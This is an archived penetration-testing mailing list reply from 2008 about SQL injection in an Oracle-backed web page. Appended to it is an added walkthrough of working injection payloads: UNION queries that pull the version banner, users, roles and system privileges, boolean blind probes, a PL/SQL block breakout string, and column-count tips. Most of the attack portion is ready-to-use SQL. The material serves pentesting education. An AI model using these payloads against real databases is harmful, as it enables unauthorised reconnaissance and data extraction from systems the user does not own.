Penetration Testing mailing list archives
Re: Oracle URL SQL Injection issue
From: Joxean Koret <joxeankoret () yahoo es>
Date: Tue, 22 Jan 2008 22:22:35 +0100
Hi,

On Mon, 2008-01-21 at 20:31 +0000, Clone wrote:

> Well, I already tried Id=90; select * from usr and I got the following:
> OCIStmtExecute: ORA-00911: invalid character in dbs.inc on line 44

OCIStmtExecute refuses to execute more than one command, except when the programmer uses a construction like:

begin proc('user_controlled_data'); end;

> BTW, how serious is the issue? Can an attacker delete or modify the database using the current issue?

It depends on the privileges the user has and on which applications are installed. First of all, you need to know the database version (banner -varchar2- from v$version), what other users there are (all_users) and, of course, your roles (user_role_privs view) and granted system privileges (user_privs).

Regards,
Joxean Koret
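The reconnaissance Joxean lists above, worked through as injection payloads that respect the single-statement limit he describes. This is an added example and is not part of the thread or of the application under discussion: the vulnerable query, the ITEMS table with its NAME, PRICE and ACTIVE columns, and the procedure PROC are assumptions made for illustration, and the standard dictionary view USER_SYS_PRIVS is used for granted system privileges.

```sql
-- Added example (not from the thread). Assumed, hypothetical vulnerable
-- query built by string concatenation from the Id parameter:
--   SELECT name, price FROM items WHERE id = <Id> AND active = 1
-- ITEMS, its columns and PROC are assumptions for illustration only.

-- 1. The stacked attempt. The ';' is an invalid character inside a single
--    OCI statement, so the driver raises ORA-00911 and nothing after the
--    first statement is parsed or run.
--    Id=90; select * from usr
SELECT name, price FROM items WHERE id = 90; select * from usr AND active = 1;

-- 2. Inline extraction with UNION: still one statement, so OCIStmtExecute
--    accepts it. The column count and types must match the original select
--    (VARCHAR2 banner against NAME, NULL against PRICE); the trailing --
--    comments out the rest of the application's query.
--    Id=90 UNION SELECT banner, NULL FROM v$version--
SELECT name, price FROM items WHERE id = 90 UNION SELECT banner, NULL FROM v$version-- AND active = 1

--    Id=90 UNION SELECT username, NULL FROM all_users--
SELECT name, price FROM items WHERE id = 90 UNION SELECT username, NULL FROM all_users-- AND active = 1

--    Id=90 UNION SELECT granted_role, NULL FROM user_role_privs--
SELECT name, price FROM items WHERE id = 90 UNION SELECT granted_role, NULL FROM user_role_privs-- AND active = 1

--    Id=90 UNION SELECT privilege, NULL FROM user_sys_privs--
SELECT name, price FROM items WHERE id = 90 UNION SELECT privilege, NULL FROM user_sys_privs-- AND active = 1

-- 3. When no result column is reflected back to the page, a scalar subquery
--    in the WHERE clause still gives a boolean answer, one bit per request.
--    Id=90 AND SUBSTR((SELECT banner FROM v$version WHERE ROWNUM=1),1,6)='Oracle'
SELECT name, price FROM items
 WHERE id = 90
   AND SUBSTR((SELECT banner FROM v$version WHERE ROWNUM = 1), 1, 6) = 'Oracle'
   AND active = 1;

--    Id=90 AND (SELECT COUNT(*) FROM user_role_privs WHERE granted_role='DBA')=1
SELECT name, price FROM items
 WHERE id = 90
   AND (SELECT COUNT(*) FROM user_role_privs WHERE granted_role = 'DBA') = 1
   AND active = 1;

-- 4. The exception Joxean mentions: the value lands inside an anonymous
--    PL/SQL block, begin proc('<input>'); end;. Closing the string and the
--    call leaves the attacker inside a block that may hold several
--    statements. With the input
--      x'); dbms_output.put_line(user); end;--
--    the block the server receives is:
begin proc('x'); dbms_output.put_line(user); end;--'); end;
```

In the UNION case the number of columns is found first by adding NULLs until the ORA-01789 ("query block has incorrect number of result columns") error disappears; the boolean form in step 3 is slower but works whenever the page behaves differently for a matched and an unmatched row.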